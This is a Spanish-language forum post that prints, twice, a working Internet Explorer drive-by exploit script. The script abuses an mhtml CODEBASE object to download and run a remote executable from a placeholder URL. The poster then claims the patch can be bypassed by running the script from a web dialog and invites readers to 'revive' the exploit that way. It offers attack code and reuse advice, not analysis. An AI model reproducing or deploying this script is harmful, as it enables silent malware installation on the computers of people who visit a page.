Autor
Código:
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
//One more fresh action is present for more stable performance
for(i=1;i<=2;i++)
w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
w.document.write("<OBJECT NAME='dmy' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\dummydummy.MHT!" + ExeUrl + "'>");
setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}
LaunchRemoteExe("http://www.dominio.com/archivo.exe")
</script>
</head>
<body>
<h1>Loading...</h1>
</body>
</html>
http://www.securityfocus.com/<head>
<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
//One more fresh action is present for more stable performance
for(i=1;i<=2;i++)
w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
w.document.write("<OBJECT NAME='dmy' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\dummydummy.MHT!" + ExeUrl + "'>");
setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}
LaunchRemoteExe("http://www.dominio.com/archivo.exe")
</script>
</head>
<body>
<h1>Loading...</h1>
</body>
</html>
bueno, apenas en cierta pagina web.. me salio un mensaje de alerta avisandome de que trataron de usar este exploit..
pero ya es viejo... y mi iexplorer esta actualizado, porque me salio la alerta?
lo peor esque no solo salio, sino que salio ya que se habia bajado el archivo, osea que si funciono, pero repito.. tengo la ultima version de iexplorer.
entonces.. llegue a la conclusion que lo habian modificado, para que el parche no funcionara..
busque en mi historial por horas.. y encontre que lo ejecutaron en un dialogo web.
lo intente ejecutar en el dialogo web.. y a que ni saben que..
el parche valio m@dr35.. y se descarga... Y ejecuta.
osea que.. si quieren revivir este exploit, solo ejecutenlo desde un dialogo.
Saludos
En línea
